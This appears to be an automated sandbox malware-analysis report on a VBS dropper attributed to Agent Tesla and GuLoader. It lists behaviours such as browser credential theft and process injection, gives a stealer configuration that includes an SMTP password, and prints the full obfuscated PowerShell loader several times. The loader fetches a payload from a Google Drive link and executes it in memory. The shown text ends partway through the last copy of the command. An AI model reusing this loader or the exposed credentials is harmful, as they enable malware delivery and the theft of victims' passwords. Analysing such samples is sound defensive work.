max time kernel
140s -
max time network
118s -
windows7_x64 -
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
23-09-2024 14:09
Static task
Behavioral task
Behavioral task
Malware Config
Protocol: smtp- Host: - Port:
587 - Username:
[email protected] - Password:
marcellinus360 - Email To:
[email protected]
Agent Tesla is a remote access tool (RAT) written in visual basic.
A shellcode based downloader first seen in 2020.
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2384 WScript.exe 7 2256 powershell.exe 9 2256 powershell.exe -
pid Process 2724 powershell.exe 2256 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 7 11 -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 20 -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2664 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2724 powershell.exe 2664 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2724 set thread context of 2664 2724 powershell.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wabmig.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2724 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2256 powershell.exe 2724 powershell.exe 2724 powershell.exe 2664 wabmig.exe 2664 wabmig.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2664 wabmig.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2664 wabmig.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2384 wrote to memory of 2256 2384 WScript.exe 30 PID 2384 wrote to memory of 2256 2384 WScript.exe 30 PID 2384 wrote to memory of 2256 2384 WScript.exe 30 PID 2256 wrote to memory of 3024 2256 powershell.exe 32 PID 2256 wrote to memory of 3024 2256 powershell.exe 32 PID 2256 wrote to memory of 3024 2256 powershell.exe 32 PID 2256 wrote to memory of 2676 2256 powershell.exe 35 PID 2256 wrote to memory of 2676 2256 powershell.exe 35 PID 2256 wrote to memory of 2676 2256 powershell.exe 35 PID 2676 wrote to memory of 2724 2676 cmd.exe 36 PID 2676 wrote to memory of 2724 2676 cmd.exe 36 PID 2676 wrote to memory of 2724 2676 cmd.exe 36 PID 2676 wrote to memory of 2724 2676 cmd.exe 36 PID 2724 wrote to memory of 1804 2724 powershell.exe 37 PID 2724 wrote to memory of 1804 2724 powershell.exe 37 PID 2724 wrote to memory of 1804 2724 powershell.exe 37 PID 2724 wrote to memory of 1804 2724 powershell.exe 37 PID 2724 wrote to memory of 2664 2724 powershell.exe 38 PID 2724 wrote to memory of 2664 2724 powershell.exe 38 PID 2724 wrote to memory of 2664 2724 powershell.exe 38 PID 2724 wrote to memory of 2664 2724 powershell.exe 38 PID 2724 wrote to memory of 2664 2724 powershell.exe 38 PID 2724 wrote to memory of 2664 2724 powershell.exe 38
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ORDER FRANCAP.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Styretjskontrollernes Dawn Flamencoerne Pennevenners Billedmedias Weltervgtere Toran #>;$Propargylic='Brandene';<#Colation Outthrob Frigiferous Radiescent #>;$Festtalere137=$host.PrivateData;If ($Festtalere137) {$Vocably++;}function Dissimilationens($sumpman){$Lavature178=$sumpman.Length-$Vocably;for( $Opoeve=4;$Opoeve -lt $Lavature178;$Opoeve+=5){$Filetering253+=$sumpman[$Opoeve];}$Filetering253;}function Metonymously($Unprecociousness){ & ($Fjerding) ($Unprecociousness);}$Afskridter=Dissimilationens 'JungMFu.koT,yrzGraviPersl T llKrubaTrk /Bloo5Kosm. En.0 nn Vi t(JoggWImpliSt ena budAmmioEpisw hunsStra KonsN subTSeks Pla1Doze0Inte. Non0data;Cram SiroWTbruiPro.nzeal6Sort4Over; Wer GassxUdpi6Gene4Zone; Pol Quadr M dvMold: Rac1Paat2bygs1 jun.Sear0h le)Atki ObstGN igesengcPlatk TaboSpek/Lith2 ith0F es1 Unb0Vase0 Aff1B li0Syn 1Udbo Vel F MediStanrS ubeviiif LunoHovexFolk/Radi1Drag2Plea1C,ad.Sem 0Mis ';$Tressen=Dissimilationens ',nteuBrevs G nESamvRC yl- BraAfyr gConseacetNsingt ril ';$Laasningers=Dissimilationens 'Ac nh PertHovet.lekpPollsMete: uin/ Muc/Lo.edSuperU atiBroqv Ryke Boe.GedegCh doTid o EnagsufflHejseTend.HospcS cloChesm Doo/OveruBra.cR se?KamgegeopxSo ap NucoUdslr.dkotlew,=Tangd Br o PopwFictn CenlSideoudsaaslukdLark&.lerima ldSqua=Bact1GeheMDiaz-Per.n Tab8.nudFErectregnFScruBRr.lZU gimFrysrPlumyO,td2 NurqCaruZMe,afUnpi2An lD ros eddaCutu3Kult5Irreh .aavIs.aU Kon3FlyknSelrw CzecSnooADdf xMod R Jel ';$epipterygoid=Dissimilationens ' gra> S,u ';$Fjerding=Dissimilationens '.ildibankeJo eX O t ';$wizier='Sukkerlager';$Anliggendes = Dissimilationens ' Sene S,rcGrunhCommoTakt Hore% pu aInvip,alkpSstjdTvrmaFriht iljaPail%Slid\FugiSShrotPromoP,nfls,vleCistmUnhuaPre g ntieB mbr,raneOp jnProt.Fo sLTrthuHedgfSno. L pt& Skr&opfi Ba eePostcl ndhFo noToug Dec tF rv ';Metonymously (Dissimilationens 'Misu$U.ingSilklKokaoKahyb iviaRafflgar :.oatgVa uoEp cuBorgtRep gS gmjAethr Bog=Etne(.loscPentm ,lod Hor Smi /HomecCore Sta $A fiAL ppnUli lBergiStrug Lu gSnase Nskn S,mdFurleSnrisMin )Fond ');Metonymously (Dissimilationens 'St d$ StngSy ml,ogrlEvig:stjkCFlath SlsaBrygrRe smS rdeUnparShe eM chdHecte,efusHere7Rets3Vrdi=Till$OverLHeteaSko a F,esPro n.lociPalon PhogSnr eStamrRid sAdr Orgp DeplgaariPlystF,rl(coun$Unite Sa pUniciIsmyp VagtFestefo,sr semyNonsgSt toLi eiGlasdPhyl)Omre ');Metonymously (Dissimilationens 'Bia [ lubNEfteeSesqtStuk.,pidSPhi e a lrTelev vaiForvcAf ie.ammPFrosoBri,iTienn PratDageMExhoaF rhnStomaNontgDispePr cr Pei]Rege:Prem:DatoSB bieMedicLituuS larIndbi rewtFjrtyknolPPhenrIdyloTroltFiltoTendcNatto An,lCyst Opre=Scu. Bell[Ki.gN HaseMel,tPriv.SeqbS enzePhocc obu nonrFra iUdvit .ocy UncPKontr Miso,pootO.pooStricUnguoHov.lBid.TSa,eyProtpM sieOmls]afra:Subf:ThymTTra l,ardsDe k1Cert2Oral ');$Laasningers=$Charmeredes73[0];$Garglers= (Dissimilationens 'Rkke$IngrgFreml un ofe kBUtnkaR geL ub:Dr jHRetae MilmNon a Uf tOphiO esDForhYEn eNVen.aEr,tM SemiV mecH,ansFors2 Mah0Fun 0T le= L nnAi ce SidwFle,-Dru OheldbFireJStatENonrCsforT ron SkiksUly,YobcosEs rtBorge AdjMLuju.Acoln PanEMa nTVrdi.M crw ranECacebNoticNonelAfhviAzo,eBelgNVag,T');$Garglers+=$goutgjr[1];Metonymously ($Garglers);Metonymously (Dissimilationens ' ont$AvaiHEuroeZin.mFldeaSa,ft Colo Bord GemyOmd,nUbesaSanemUforiAdencMellsInge2Serg0,elv0Nipp.JourHHibee .foare kdRurae Ud,rBlacsTann[ Pa $GrunT ElerSkriesif sLs fsKribePullnUnex]ufri=Woef$tipvA Pl.f GaisF rvkDroprB lli Ludd nbrtK,noeVirorVo,d ');$trsteslses=Dissimilationens ' Sti$Ca,aH None lotmUrdeaDadatteakoMichdSsygy R,nnUndvaPre mTel iPro.cSno ,isD AfsoFotowBe.anAdaml RitoSmaaa,mebdConsFste.iTrivl unge .to( ynd$HjemLS.peaFinsa .issLyrinu mei skrn C.bgLo seOpspr E tsOh l, G a$SlumSFremep,yleT mmdBoufbRidsaWal l,onelUr n)Hal. ';$Seedball=$goutgjr[0];Metonymously (Dissimilationens 'Ma k$ rudg CamLB trORe vbIsopa N nLBosw:Ade.C.ypeAHi tiCoa rRaado LibSConn=ps.u( FastMomme ProsUncrtGris-PurpPUnqua Om T RetH R k F,l$Bi msepitEFlase,onvdSoldbNekrAeleflProcLBasi) Pra ');while (!$cairos) {Metonymously (Dissimilationens 'Resi$SpecgNonrlIsopoKortb Klaa Sy.lInds:KrydPE,emrSubhiSknmv V,kafragt L,vkDissostalnKvido,iffmKariiResisTrunk Fig=Best$GabbtPe srUnitu,aaneBre ') ;Metonymously $trsteslses;Metonymously (Dissimilationens 'pseuS xcet SkiaA gir,medt For- ireS ftelEnd.eEjeneGri.ptaxa N,na4ha.m ');Metonymously (Dissimilationens 'Micr$,osogdyrblEmmeo AmebFe,faSmaglUter:LysscSub aNondiArchrBum,oLigus ,um=S ei(EgenTOlieeG.ilsV.kstUrov-S rmPSj saSugatMonah Dip Lsl.$ TreS nueFrateStaydAp,ob Kata To l Po lSt k) Spo ') ;Metonymously (Dissimilationens 'Ko m$t,rsgwrenlAirpo Freb,ofiaHingl ick:E,clRGa ta,edht Su,cOp shKomme Manl E.m=Kalv$Co.ggPrehl gono T abNi.oaLaa,l Mam:EnfrlUdary FordSynte G.rn boneHids+Fir +ince%Aspa$presCProph SadaKomprRhesmTr,teAlisr isae Weld Svie erasLege7Kbma3u sk.NullcKinao Axiuim enUntrt Sli ') ;$Laasningers=$Charmeredes73[$Ratchel];}$Euforiserede=301782;$Lovas=28321;Metonymously (Dissimilationens 'Ne,s$ lcgDivel MeloVinob WkuaNatilMoti:Fl dP eataPse r .oltKandi nrue ResrCymonMea eSem lat= Unf tpaGAortePikatFl,e-Si uCK kooFeltn Vant ukkeDaggnMisptUdst D xt$Ta,gSguiceSn,peG nidTababNazia,hril Dagl,rug ');Metonymously (Dissimilationens 'Mo i$Shi.gDis lD,cooS asbIndeaPlirlSmit:eoitK afhnDephkfasceVarmlTangsTurge,nnar Ove Af =Sche Fopi[BgerSDhabyAa ssElectTn eePrejmGend.KaadCCaraoR.conRi ivEskaeClaqrKvajtAer,]Und : Phi: erFDiftrPlunoL.ttm RivBAdgaaFrapsDingeFald6 Hov4Vag.SCamptMinerKrafi uknF ltgA de( Taf$StttP M.faasymrStaetEndei Eq.eTablrForfnHaareDesp)Coll ');Metonymously (Dissimilationens 'emde$ CabgOph l luboHelbbgalaa Grol Avo:CausF,injarig mShaniPh,tlMil i H weKennlSaligsyn eUnfirEvesnBatoe HecsEoln1 Pla0biop2.ede Sham=H pe Enkl[ ntrSPla ySlugsVerdtBkk,e r,cmStil.ZoonTSyndeBrasxVkstt en.OutsENattnFyl cVandoLan dDiskiUnlun BengKneb]Neot:Gasb: St AEnteSHo,tCG aiIRow.ISt t.AlmeGSkvaeBaa tRa.dSBrustBoerrGelaiB dynexargunde( lik$KindKPligrWaw.n F,ykHrf e ArblAnt sSp ae pisrFuse)Dok ');Metonymously (Dissimilationens 'Numb$HelvgRosel An,oBoykb KonaNeurl Lan:SitoA.yvesS simBesmu.rsenO tpdBatc=k lk$hypoFOry.aBankmhy ni tekl Sm i rayeIrrelAttagtndseBa irM lenSubfe Ia,s ar1Lawm0Aust2 eco. M dsBa nuWhisbGlazs.albt ArdrBilliP ngnSultgBale(Con,$NtteEHenruF ugf uffo ,ter,ndoiOutfsSerieSvagr kane.randNonfe Str,Pet $ EquLCateoAmbiv xyaSmitsWims)Scyp ');Metonymously $Asmund;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stolemageren.Luf && echo t"3⤵PID:3024
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Styretjskontrollernes Dawn Flamencoerne Pennevenners Billedmedias Weltervgtere Toran #>;$Propargylic='Brandene';<#Colation Outthrob Frigiferous Radiescent #>;$Festtalere137=$host.PrivateData;If ($Festtalere137) {$Vocably++;}function Dissimilationens($sumpman){$Lavature178=$sumpman.Length-$Vocably;for( $Opoeve=4;$Opoeve -lt $Lavature178;$Opoeve+=5){$Filetering253+=$sumpman[$Opoeve];}$Filetering253;}function Metonymously($Unprecociousness){ & ($Fjerding) ($Unprecociousness);}$Afskridter=Dissimilationens 'JungMFu.koT,yrzGraviPersl T llKrubaTrk /Bloo5Kosm. En.0 nn Vi t(JoggWImpliSt ena budAmmioEpisw hunsStra KonsN subTSeks Pla1Doze0Inte. Non0data;Cram SiroWTbruiPro.nzeal6Sort4Over; Wer GassxUdpi6Gene4Zone; Pol Quadr M dvMold: Rac1Paat2bygs1 jun.Sear0h le)Atki ObstGN igesengcPlatk TaboSpek/Lith2 ith0F es1 Unb0Vase0 Aff1B li0Syn 1Udbo Vel F MediStanrS ubeviiif LunoHovexFolk/Radi1Drag2Plea1C,ad.Sem 0Mis ';$Tressen=Dissimilationens ',nteuBrevs G nESamvRC yl- BraAfyr gConseacetNsingt ril ';$Laasningers=Dissimilationens 'Ac nh PertHovet.lekpPollsMete: uin/ Muc/Lo.edSuperU atiBroqv Ryke Boe.GedegCh doTid o EnagsufflHejseTend.HospcS cloChesm Doo/OveruBra.cR se?KamgegeopxSo ap NucoUdslr.dkotlew,=Tangd Br o PopwFictn CenlSideoudsaaslukdLark&.lerima ldSqua=Bact1GeheMDiaz-Per.n Tab8.nudFErectregnFScruBRr.lZU gimFrysrPlumyO,td2 NurqCaruZMe,afUnpi2An lD ros eddaCutu3Kult5Irreh .aavIs.aU Kon3FlyknSelrw CzecSnooADdf xMod R Jel ';$epipterygoid=Dissimilationens ' gra> S,u ';$Fjerding=Dissimilationens '.ildibankeJo eX O t ';$wizier='Sukkerlager';$Anliggendes = Dissimilationens ' Sene S,rcGrunhCommoTakt Hore% pu aInvip,alkpSstjdTvrmaFriht iljaPail%Slid\FugiSShrotPromoP,nfls,vleCistmUnhuaPre g ntieB mbr,raneOp jnProt.Fo sLTrthuHedgfSno. L pt& Skr&opfi Ba eePostcl ndhFo noToug Dec tF rv ';Metonymously (Dissimilationens 'Misu$U.ingSilklKokaoKahyb iviaRafflgar :.oatgVa uoEp cuBorgtRep gS gmjAethr Bog=Etne(.loscPentm ,lod Hor Smi /HomecCore Sta $A fiAL ppnUli lBergiStrug Lu gSnase Nskn S,mdFurleSnrisMin )Fond ');Metonymously (Dissimilationens 'St d$ StngSy ml,ogrlEvig:stjkCFlath SlsaBrygrRe smS rdeUnparShe eM chdHecte,efusHere7Rets3Vrdi=Till$OverLHeteaSko a F,esPro n.lociPalon PhogSnr eStamrRid sAdr Orgp DeplgaariPlystF,rl(coun$Unite Sa pUniciIsmyp VagtFestefo,sr semyNonsgSt toLi eiGlasdPhyl)Omre ');Metonymously (Dissimilationens 'Bia [ lubNEfteeSesqtStuk.,pidSPhi e a lrTelev vaiForvcAf ie.ammPFrosoBri,iTienn PratDageMExhoaF rhnStomaNontgDispePr cr Pei]Rege:Prem:DatoSB bieMedicLituuS larIndbi rewtFjrtyknolPPhenrIdyloTroltFiltoTendcNatto An,lCyst Opre=Scu. Bell[Ki.gN HaseMel,tPriv.SeqbS enzePhocc obu nonrFra iUdvit .ocy UncPKontr Miso,pootO.pooStricUnguoHov.lBid.TSa,eyProtpM sieOmls]afra:Subf:ThymTTra l,ardsDe k1Cert2Oral ');$Laasningers=$Charmeredes73[0];$Garglers= (Dissimilationens 'Rkke$IngrgFreml un ofe kBUtnkaR geL ub:Dr jHRetae MilmNon a Uf tOphiO esDForhYEn eNVen.aEr,tM SemiV mecH,ansFors2 Mah0Fun 0T le= L nnAi ce SidwFle,-Dru OheldbFireJStatENonrCsforT ron SkiksUly,YobcosEs rtBorge AdjMLuju.Acoln PanEMa nTVrdi.M crw ranECacebNoticNonelAfhviAzo,eBelgNVag,T');$Garglers+=$goutgjr[1];Metonymously ($Garglers);Metonymously (Dissimilationens ' ont$AvaiHEuroeZin.mFldeaSa,ft Colo Bord GemyOmd,nUbesaSanemUforiAdencMellsInge2Serg0,elv0Nipp.JourHHibee .foare kdRurae Ud,rBlacsTann[ Pa $GrunT ElerSkriesif sLs fsKribePullnUnex]ufri=Woef$tipvA Pl.f GaisF rvkDroprB lli Ludd nbrtK,noeVirorVo,d ');$trsteslses=Dissimilationens ' Sti$Ca,aH None lotmUrdeaDadatteakoMichdSsygy R,nnUndvaPre mTel iPro.cSno ,isD AfsoFotowBe.anAdaml RitoSmaaa,mebdConsFste.iTrivl unge .to( ynd$HjemLS.peaFinsa .issLyrinu mei skrn C.bgLo seOpspr E tsOh l, G a$SlumSFremep,yleT mmdBoufbRidsaWal l,onelUr n)Hal. ';$Seedball=$goutgjr[0];Metonymously (Dissimilationens 'Ma k$ rudg CamLB trORe vbIsopa N nLBosw:Ade.C.ypeAHi tiCoa rRaado LibSConn=ps.u( FastMomme ProsUncrtGris-PurpPUnqua Om T RetH R k F,l$Bi msepitEFlase,onvdSoldbNekrAeleflProcLBasi) Pra ');while (!$cairos) {Metonymously (Dissimilationens 'Resi$SpecgNonrlIsopoKortb Klaa Sy.lInds:KrydPE,emrSubhiSknmv V,kafragt L,vkDissostalnKvido,iffmKariiResisTrunk Fig=Best$GabbtPe srUnitu,aaneBre ') ;Metonymously $trsteslses;Metonymously (Dissimilationens 'pseuS xcet SkiaA gir,medt For- ireS ftelEnd.eEjeneGri.ptaxa N,na4ha.m ');Metonymously (Dissimilationens 'Micr$,osogdyrblEmmeo AmebFe,faSmaglUter:LysscSub aNondiArchrBum,oLigus ,um=S ei(EgenTOlieeG.ilsV.kstUrov-S rmPSj saSugatMonah Dip Lsl.$ TreS nueFrateStaydAp,ob Kata To l Po lSt k) Spo ') ;Metonymously (Dissimilationens 'Ko m$t,rsgwrenlAirpo Freb,ofiaHingl ick:E,clRGa ta,edht Su,cOp shKomme Manl E.m=Kalv$Co.ggPrehl gono T abNi.oaLaa,l Mam:EnfrlUdary FordSynte G.rn boneHids+Fir +ince%Aspa$presCProph SadaKomprRhesmTr,teAlisr isae Weld Svie erasLege7Kbma3u sk.NullcKinao Axiuim enUntrt Sli ') ;$Laasningers=$Charmeredes73[$Ratchel];}$Euforiserede=301782;$Lovas=28321;Metonymously (Dissimilationens 'Ne,s$ lcgDivel MeloVinob WkuaNatilMoti:Fl dP eataPse r .oltKandi nrue ResrCymonMea eSem lat= Unf tpaGAortePikatFl,e-Si uCK kooFeltn Vant ukkeDaggnMisptUdst D xt$Ta,gSguiceSn,peG nidTababNazia,hril Dagl,rug ');Metonymously (Dissimilationens 'Mo i$Shi.gDis lD,cooS asbIndeaPlirlSmit:eoitK afhnDephkfasceVarmlTangsTurge,nnar Ove Af =Sche Fopi[BgerSDhabyAa ssElectTn eePrejmGend.KaadCCaraoR.conRi ivEskaeClaqrKvajtAer,]Und : Phi: erFDiftrPlunoL.ttm RivBAdgaaFrapsDingeFald6 Hov4Vag.SCamptMinerKrafi uknF ltgA de( Taf$StttP M.faasymrStaetEndei Eq.eTablrForfnHaareDesp)Coll ');Metonymously (Dissimilationens 'emde$ CabgOph l luboHelbbgalaa Grol Avo:CausF,injarig mShaniPh,tlMil i H weKennlSaligsyn eUnfirEvesnBatoe HecsEoln1 Pla0biop2.ede Sham=H pe Enkl[ ntrSPla ySlugsVerdtBkk,e r,cmStil.ZoonTSyndeBrasxVkstt en.OutsENattnFyl cVandoLan dDiskiUnlun BengKneb]Neot:Gasb: St AEnteSHo,tCG aiIRow.ISt t.AlmeGSkvaeBaa tRa.dSBrustBoerrGelaiB dynexargunde( lik$KindKPligrWaw.n F,ykHrf e ArblAnt sSp ae pisrFuse)Dok ');Metonymously (Dissimilationens 'Numb$HelvgRosel An,oBoykb KonaNeurl Lan:SitoA.yvesS simBesmu.rsenO tpdBatc=k lk$hypoFOry.aBankmhy ni tekl Sm i rayeIrrelAttagtndseBa irM lenSubfe Ia,s ar1Lawm0Aust2 eco. M dsBa nuWhisbGlazs.albt ArdrBilliP ngnSultgBale(Con,$NtteEHenruF ugf uffo ,ter,ndoiOutfsSerieSvagr kane.randNonfe Str,Pet $ EquLCateoAmbiv xyaSmitsWims)Scyp ');Metonymously $Asmund;"3⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Styretjskontrollernes Dawn Flamencoerne Pennevenners Billedmedias Weltervgtere Toran #>;$Propargylic='Brandene';<#Colation Outthrob Frigiferous Radiescent #>;$Festtalere137=$host.PrivateData;If ($Festtalere137) {$Vocably++;}function Dissimilationens($sumpman){$Lavature178=$sumpman.Length-$Vocably;for( $Opoeve=4;$Opoeve -lt $Lavature178;$Opoeve+=5){$Filetering253+=$sumpman[$Opoeve];}$Filetering253;}function Metonymously($Unprecociousness){ & ($Fjerding) ($Unprecociousness);}$Afskridter=Dissimilationens 'JungMFu.koT,yrzGraviPersl T llKrubaTrk /Bloo5Kosm. En.0 nn Vi t(JoggWImpliSt ena budAmmioEpisw hunsStra KonsN subTSeks Pla1Doze0Inte. Non0data;Cram SiroWTbruiPro.nzeal6Sort4Over; Wer GassxUdpi6Gene4Zone; Pol Quadr M dvMold: Rac1Paat2bygs1 jun.Sear0h le)Atki ObstGN igesengcPlatk TaboSpek/Lith2 ith0F es1 Unb0Vase0 Aff1B li0Syn 1Udbo Vel F MediStanrS ubeviiif LunoHovexFolk/Radi1Drag2Plea1C,ad.Sem 0Mis ';$Tressen=Dissimilationens ',nteuBrevs G nESamvRC yl- BraAfyr gConseacetNsingt ril ';$Laasningers=Dissimilationens 'Ac nh PertHovet.lekpPollsMete: uin/ Muc/Lo.edSuperU atiBroqv Ryke Boe.GedegCh doTid o EnagsufflHejseTend.HospcS cloChesm Doo/OveruBra.cR se?KamgegeopxSo ap NucoUdslr.dkotlew,=Tangd Br o PopwFictn CenlSideoudsaaslukdLark&.lerima ldSqua=Bact1GeheMDiaz-Per.n Tab8.nudFErectregnFScruBRr.lZU gimFrysrPlumyO,td2 NurqCaruZMe,afUnpi2An lD ros eddaCutu3Kult5Irreh .aavIs.aU Kon3FlyknSelrw CzecSnooADdf xMod R Jel ';$epipterygoid=Dissimilationens ' gra> S,u ';$Fjerding=Dissimilationens '.ildibankeJo eX O t ';$wizier='Sukkerlager';$Anliggendes = Dissimilationens ' Sene S,rcGrunhCommoTakt Hore% pu aInvip,alkpSstjdTvrmaFriht iljaPail%Slid\FugiSShrotPromoP,nfls,vleCistmUnhuaPre g ntieB mbr,raneOp jnProt.Fo sLTrthuHedgfSno. L pt& Skr&opfi Ba eePostcl ndhFo noToug Dec tF rv ';Metonymously (Dissimilationens 'Misu$U.ingSilklKokaoKahyb iviaRafflgar :.oatgVa uoEp cuBorgtRep gS gmjAethr Bog=Etne(.loscPentm ,lod Hor Smi /HomecCore Sta $A fiAL ppnUli lBergiStrug Lu gSnase Nskn S,mdFurleSnrisMin )Fond ');Metonymously (Dissimilationens 'St d$ StngSy ml,ogrlEvig:stjkCFlath SlsaBrygrRe smS rdeUnparShe eM chdHecte,efusHere7Rets3Vrdi=Till$OverLHeteaSko a F,esPro n.lociPalon PhogSnr eStamrRid sAdr Orgp DeplgaariPlystF,rl(coun$Unite Sa pUniciIsmyp VagtFestefo,sr semyNonsgSt toLi eiGlasdPhyl)Omre ');Metonymously (Dissimilationens 'Bia [ lubNEfteeSesqtStuk.,pidSPhi e a lrTelev vaiForvcAf ie.ammPFrosoBri,iTienn PratDageMExhoaF rhnStomaNontgDispePr cr Pei]Rege:Prem:DatoSB bieMedicLituuS larIndbi rewtFjrtyknolPPhenrIdyloTroltFiltoTendcNatto An,lCyst Opre=Scu. Bell[Ki.gN HaseMel,tPriv.SeqbS enzePhocc obu nonrFra iUdvit .ocy UncPKontr Miso,pootO.pooStricUnguoHov.lBid.TSa,eyProtpM sieOmls]afra:Subf:ThymTTra l,ardsDe k1Cert2Oral ');$Laasningers=$Charmeredes73[0];$Garglers= (Dissimilationens 'Rkke$IngrgFreml un ofe kBUtnkaR geL ub:Dr jHRetae MilmNon a Uf tOphiO esDForhYEn eNVen.aEr,tM SemiV mecH,ansFors2 Mah0Fun 0T le= L nnAi ce SidwFle,-Dru OheldbFireJStatENonrCsforT ron SkiksUly,YobcosEs rtBorge AdjMLuju.Acoln PanEMa nTVrdi.M crw ranECacebNoticNonelAfhviAzo,eBelgNVag,T');$Garglers+=$goutgjr[1];Metonymously ($Garglers);Metonymously (Dissimilationens ' ont$AvaiHEuroeZin.mFldeaSa,ft Colo Bord GemyOmd,nUbesaSanemUforiAdencMellsInge2Serg0,elv0Nipp.JourHHibee .foare kdRurae Ud,rBlacsTann[ Pa $GrunT ElerSkriesif sLs fsKribePullnUnex]ufri=Woef$tipvA Pl.f GaisF rvkDroprB lli Ludd nbrtK,noeVirorVo,d ');$trsteslses=Dissimilationens ' Sti$Ca,aH None lotmUrdeaDadatteakoMichdSsygy R,nnUndvaPre mTel iPro.cSno ,isD AfsoFotowBe.anAdaml RitoSmaaa,mebdConsFste.iTrivl unge .to( ynd$HjemLS.peaFinsa .issLyrinu mei skrn C.bgLo seOpspr E tsOh l, G a$SlumSFremep,yleT mmdBoufbRidsaWal l,onelUr n)Hal. ';$Seedball=$goutgjr[0];Metonymously (Dissimilationens 'Ma k$ rudg CamLB trORe vbIsopa N nLBosw:Ade.C.ypeAHi tiCoa rRaado LibSConn=ps.u( FastMomme ProsUncrtGris-PurpPUnqua Om T RetH R k F,l$Bi msepitEFlase,onvdSoldbNekrAeleflProcLBasi) Pra ');while (!$cairos) {Metonymously (Dissimilationens 'Resi$SpecgNonrlIsopoKortb Klaa Sy.lInds:KrydPE,emrSubhiSknmv V,kafragt L,vkDissostalnKvido,iffmKariiResisTrunk Fig=Best$GabbtPe srUnitu,aaneBre ') ;Metonymously $trsteslses;Metonymously (Dissimilationens 'pseuS xcet SkiaA gir,medt For- ireS ftelEnd.eEjeneGri.ptaxa N,na4ha.m ');Metonymously (Dissimilationens 'Micr$,osogdyrblEmmeo AmebFe,faSmaglUter:LysscSub aNondiArchrBum,oLigus ,um=S ei(EgenTOlieeG.ilsV.kstUrov-S rmPSj saSugatMonah Dip Lsl.$ TreS nueFrateStaydAp,ob Kata To l Po lSt k) Spo ') ;Metonymously (Dissimilationens 'Ko m$t,rsgwrenlAirpo Freb,ofiaHingl ick:E,clRGa ta,edht Su,cOp shKomme Manl E.m=Kalv$Co.ggPrehl gono T abNi.oaLaa,l Mam:EnfrlUdary FordSynte G.rn boneHids+Fir +ince%Aspa$presCProph SadaKomprRhesmTr,teAlisr isae Weld Svie erasLege7Kbma3u sk.NullcKinao Axiuim enUntrt Sli ') ;$Laasningers=$Charmeredes73[$Ratchel];}$Euforiserede=301782;$Lovas=28321;Metonymously (Dissimilationens 'Ne,s$ lcgDivel MeloVinob WkuaNatilMoti:Fl dP eataPse r .oltKandi nrue ResrCymonMea eSem lat= Unf tpaGAortePikatFl,e-Si uCK kooFeltn Vant ukkeDaggnMisptUdst D xt$Ta,gSguiceSn,peG nidTababNazia,hril Dagl,rug ');Metonymously (Dissimilationens 'Mo i$Shi.gDis lD,cooS asbIndeaPlirlSmit:eoitK afhnDephkfasceVarmlTangsTurge,nnar Ove Af =Sche Fopi[BgerSDhabyAa ssElectTn eePrejmGend.KaadCCaraoR.conRi ivEskaeClaqrKvajtAer,]Und : Phi: erFDiftrPlunoL.ttm RivBAdgaaFrapsDingeFald6 Hov4Vag.SCamptMinerKrafi uknF ltgA de( Taf$StttP M.faasymrStaetEndei Eq.eTablrForfnHaareDesp)Coll ');Metonymously (Dissimilationens 'emde$ CabgOph l luboHelbbgalaa Grol Avo:CausF,injarig mShaniPh,tlMil i H weKennlSaligsyn eUnfirEvesnBatoe HecsEoln1 Pla0biop2.ede Sham=H pe Enkl[ ntrSPla ySlugsVerdtBkk,e r,cmStil.ZoonTSyndeBrasxVkstt en.OutsENattnFyl cVandoLan dDiskiUnlun BengKneb]Neot:Gasb: St AEnteSHo,tCG aiIRow.ISt t.AlmeGSkvaeBaa tRa.dSBrustBoerrGelaiB dynexargunde( lik$KindKPligrWaw.n F,ykHrf e ArblAnt sSp ae pisrFuse)Dok ');Metonymously (Dissimilationens 'Numb$HelvgRosel An,oBoykb KonaNeurl Lan:SitoA.yvesS simBesmu.rsenO tpdBatc=k lk$hypoFOry.aBankmhy ni tekl Sm i rayeIrrelAttagtndseBa irM lenSubfe Ia,s ar1Lawm0Aust2 eco. 